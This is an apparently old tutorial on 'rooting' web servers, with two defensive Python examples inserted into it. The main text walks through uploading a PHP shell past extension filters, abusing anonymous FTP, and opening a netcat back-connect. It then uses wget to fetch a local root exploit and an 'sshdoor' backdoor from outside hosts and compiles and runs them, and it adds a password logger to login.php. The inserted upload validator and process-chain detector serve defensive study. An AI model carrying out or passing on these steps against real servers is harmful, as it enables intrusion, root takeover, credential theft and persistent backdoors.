Full Rooting Explanation
Rooting isn’t just finding a local root exploit. Rooting is gaining a high-privilege uid on a server, which gives control of the entire server. Most people think they are actually completing the rooting step when they are not; all they do is mix the following together in this order:

1. Back-connect, or use the prompt in the shell itself, and type in uname -a

2. Get the version for the box; it may look something like 2.6.18


3. Go on SecurityFocus or 1337day.com and search for it.

4. Get a connection via back-connect, then simply wget a local root exploit. Or simply go to the PHP shell itself, go to a directory and upload a .c file containing a local root exploit.

5. Get the name it was saved under; it will appear in the wget output, or if you uploaded it via the shell, you already know the name because you chose it.

6. Then simply gcc -o ExploitName LocalRootExploitName.c

But today I will be showing you how to do this and actually understand what you are doing. You will use 1337day, and while you are doing this you will upgrade your knowledge.

First, get your PHP shell. You can upload it through FTP using mput (mput is a command used to put a file from your system onto the server, for example: mput C:\users\X-pOSed\shell.php).
Or you can do it if you find an upload.php page on the system. Of course, upload.php may allow uploading .php files, or it may have a filter that accepts only .jpg/.png/etc. This can often be bypassed through a null byte upload; to do this, all you need to do is save your PHP script under a .jpg file name.

You can do this by following these steps:

1. Open Notepad

2. Add your php script

3. File >> Save as >> shellname.php.jpg (the null byte goes into the file name as a URL-encoded byte)

4. Upload on the server.

The null byte terminates the string, so anything after it is ignored.

But this is patched on many web servers, so DO NOT expect it to work 100% of the time.
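The filter the post is bypassing looks only at the last extension of the client-supplied name. As an added example (not code from the original post), here is that weak check beside a hardened version that rejects control bytes and double extensions, checks the file header against the claimed type, and never stores the file under the client's name. All file names and byte strings are constructed test inputs.

```python
"""
Weak vs hardened upload validation for the "shell.php.jpg" / null-byte trick.
Added example; not part of the original post. Inputs below are constructed.
"""
import os
import re
import secrets

# Allow-listed extensions and the file header (magic bytes) each must start with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}

NAME_RE = re.compile(r"[A-Za-z0-9_-]+\.([a-z0-9]+)")  # exactly one extension


def weak_is_allowed(filename: str) -> bool:
    """The kind of check the post bypasses: only the final extension is inspected,
    so "shell.php.jpg" and "shell.php\\x00.jpg" both pass."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED


def hardened_is_allowed(filename: str, content: bytes) -> bool:
    """Reject anything that is not a plain single-extension image name whose
    bytes match the claimed type."""
    # 1. No null bytes or other control characters anywhere in the name.
    if any(ord(c) < 0x20 or c == "\x7f" for c in filename):
        return False
    # 2. No path components: the server, not the client, picks the directory.
    if os.path.basename(filename) != filename:
        return False
    # 3. Exactly one extension, and it must be on the allow-list.
    m = NAME_RE.fullmatch(filename.lower())
    if m is None or m.group(1) not in ALLOWED:
        return False
    # 4. The header must agree with the extension (a PHP file is not a JPEG).
    return content.startswith(ALLOWED[m.group(1)])


def storage_name(filename: str, content: bytes):
    """Return a server-chosen name for an accepted upload, or None if rejected.
    The client's name never reaches the filesystem; only the validated extension does."""
    if not hardened_is_allowed(filename, content):
        return None
    ext = NAME_RE.fullmatch(filename.lower()).group(1)
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16          # constructed JPEG header
    php = b"<?php echo 'not an image'; ?>"             # constructed PHP payload
    for name, body in [("photo.jpg", jpeg), ("shell.php.jpg", jpeg),
                       ("shell.php\x00.jpg", jpeg), ("photo.jpg", php)]:
        print(repr(name), "weak:", weak_is_allowed(name),
              "hardened:", hardened_is_allowed(name, body))
```

The weak check is what makes the double-extension name pass; the hardened check fails it at step 3 (two extensions) and the null-byte variant at step 1, and a PHP body under a clean .jpg name fails at step 4. Storing under a random server-chosen name also means the upload directory should be served with script execution disabled, since nothing in it will ever legitimately be PHP.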

But if /upload.php accepts the .php extension, then upload your normal PHP shell. After that you need to find the directory it landed in; you can usually get this by doing the following:

1. The target site has to have anonymous FTP login enabled.

2. Open Command Prompt

3. Type in ftp www.victim.com

4. Enter wrong details when it asks for user and password

5. After that is finished, type in: quote user ftp (sends the USER command with the name ftp), then type in: quote cwd ~root (sends CWD to change into root's home directory), then type in: quote pass ftp

Now you have the ability to view directories, cd to directories, etc.

Try finding an incoming directory, and if you do, try finding your shell in it.

If you cannot find anything, there are other things you can do.

You can use the Acunetix web scanner to find directories.

After you have your shell up and ready, play around a bit and try finding MySQL details (in config.php, IRC details in ircd.conf, etc.). If you find them, there is probably a MySQL option in your shell; use it. You can also try logging in over SSH with those details, which can get you root easily. To try this, you cannot just telnet to port 22, because SSH has its own protocol and client.

Download PuTTY here:

http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Insert the host you want to connect to, and be sure the connection type is set to SSH.

Once you do that, press Open.

Now try the details you got from config.php.
If it doesn’t work, you’re out of luck on that route.

But, we do not stop there.

Go to “Back Connection”. Your IP goes in the first text box and your port in the second text box; the port you want to back-connect to needs to be forwarded. This is easily done through your router’s web admin page. You can find your local address and gateway in Command Prompt by typing ipconfig, and on Linux all you need to do is type ifconfig.

Now go to the main router page (192.168.0.1 as an example), then search around for Port Forwarding. Your router page may require a password; if it has been changed, simply reset your router, and if it still does not work, search on Google.

After your port is forwarded (port forward example: 1337), insert it into the second text box. But wait, you’re not done. You will need to install netcat; on Linux simply:

sudo apt-get install netcat

And in Windows, go to this link:

http://joncraton.org/files/nc111nt.zip

You might need WinRAR or another extractor to unzip it. Put nc111nt.zip in a directory: on your desktop, in documents, anywhere. I recommend putting it on the desktop for the time being.

Then open Command Prompt and type in cd C:\users\NAME\desktop\nc111nt (the folder you extracted the zip into).

Now, when you’re in there, type:

nc

If anything comes back, it’s working.

Now type in:

nc -l -n -v -p PORT

PORT needs to be replaced with the port you forwarded.

Press Enter, then go to your shell and press the connect button (on the back-connection page where you inserted your IP along with the forwarded port).

Now you should be in your back-connect session. Type in:

uname -a

This shows the kernel version, hostname, build date and architecture, for example:

Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Mon Jar 30 08:14:05 EDT 2011 i686

Now go to 1337day.com and search for 2.6.17; there are several results.

What you find there is a C program that can be used for gaining root on the server.
We can do this two ways; let’s discuss the first:

1. Open Notepad

2. Put in the C script

3. File >> Save as >> LocalRootExploit.c

4. Upload it on the shell

5. Open your netcat session

6. Type in gcc -o root LocalRootExploit.c (gcc is the C compiler; -o root names the output binary, and LocalRootExploit.c is the file we uploaded earlier via our shell)

7. Type in ./root

8. It should compile and give you root. To be sure, simply type in:
whoami and/or id. If whoami comes back with root, you’ve completed your mission, and if id comes back with something like uid=0(root), you’ve completed your mission as well.

Or we can do this via netcat:

1. Go to your netcat session

2. Type in wget http://milw0rm.com/exploits/5092 (wget is used to download a file from a particular server, in this case milw0rm)

3. Since 5092 was the last part of our URL, that is the file name we will need to compile

4. Type in gcc -o root 5092 (gcc is the C compiler; -o root names the output binary, and 5092 is the file we wget’d earlier)

5. Type in ./root

6. It should compile and give you root. To be sure, simply type in:
whoami and/or id. If whoami comes back with root, you’ve completed your mission, and if id comes back with something like uid=0(root), you’ve completed your mission as well.

Now you can add an SSH backdoor (sshdoor) via:

wget http://www.familysksd.phpnet.us/sshdoor

You can use plenty of commands and even sudo apt-get install extra tools; you can also use the edit command or Emacs to add a PHP-based password logger to login.php.
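Everything from the back-connect onward (netcat reaching out, uname -a, wget of a source file or sshdoor, gcc, running the result from a scratch directory) is a chain of process executions by the web server's account, and that is where a defender catches it. As an added example (not from the original post), here is detection logic over a constructed, simplified process-audit line format that stands in for auditd execve records or an EDR process feed; the account names, paths and log lines are all constructed.

```python
"""
Detect the web-shell post-upload chain: outbound shell, recon, fetch, compile,
execute from a scratch directory, all under a web-server account.
Added example; not part of the original post. Log format and lines are constructed.

Constructed line format:
    <ts> user=<account> parent=<parent comm> exe=<path> args="<command line>"
"""
import os
import re
from collections import defaultdict

LINE_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) '
    r'exe=(?P<exe>\S+) args="(?P<args>[^"]*)"$'
)

# Accounts that should never be compiling code or opening outbound shells.
WEB_ACCOUNTS = {"www-data", "apache", "httpd", "nginx", "nobody"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def stage_of(exe: str, args: str):
    """Map one execution to the stage of the chain it belongs to, or None."""
    name = os.path.basename(exe)
    if name in {"nc", "ncat", "netcat"}:
        return "outbound_shell"
    if name in {"uname", "id", "whoami"}:
        return "recon"
    if name in {"wget", "curl", "ftp", "tftp"}:
        return "fetch"
    if name in {"gcc", "cc", "tcc", "clang"}:
        return "compile"
    if exe.startswith(SCRATCH_DIRS):
        return "run_from_scratch_dir"
    return None


def parse_line(line: str):
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(lines, min_stages: int = 2):
    """Collect chain stages per web account; alert when an account shows
    at least min_stages distinct stages. Returns findings, stages and alerts."""
    stages = defaultdict(set)
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["user"] not in WEB_ACCOUNTS:
            continue  # unparsable, or an ordinary user account: not this rule's job
        st = stage_of(ev["exe"], ev["args"])
        if st is not None:
            stages[ev["user"]].add(st)
            findings.append((ev["ts"], ev["user"], st, ev["args"]))
    alerts = sorted(u for u, s in stages.items() if len(s) >= min_stages)
    return {"findings": findings, "stages": dict(stages), "alerts": alerts}


# Constructed sample: one web-shell chain plus one benign developer compile.
SAMPLE_LINES = [
    '2011-01-30T08:14:05 user=www-data parent=sh exe=/bin/nc args="nc 203.0.113.7 1337"',
    '2011-01-30T08:14:09 user=www-data parent=sh exe=/bin/uname args="uname -a"',
    '2011-01-30T08:14:40 user=www-data parent=sh exe=/usr/bin/wget args="wget http://example.invalid/5092"',
    '2011-01-30T08:15:02 user=www-data parent=sh exe=/usr/bin/gcc args="gcc -o root 5092"',
    '2011-01-30T08:15:10 user=www-data parent=sh exe=/tmp/root args="./root"',
    '2011-01-30T08:16:30 user=www-data parent=sh exe=/usr/bin/wget args="wget http://example.invalid/sshdoor"',
    '2011-01-30T09:00:00 user=alice parent=bash exe=/usr/bin/gcc args="gcc -o hello hello.c"',
    'not a valid audit line',
]

if __name__ == "__main__":
    result = analyze(SAMPLE_LINES)
    for ts, user, stage, args in result["findings"]:
        print(f"{ts} {user:9} {stage:22} {args}")
    print("alerts:", result["alerts"])
```

A single gcc run is normal for a developer account and is ignored here, while the same binary under www-data counts as a stage. Requiring two or more stages keeps a lone uname -a from a misbehaving plugin from paging anyone, but the chain in the post trips every stage within two minutes. The same grouping can be keyed on the web server's process tree instead of the account name when the audit source carries parent-child lineage.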
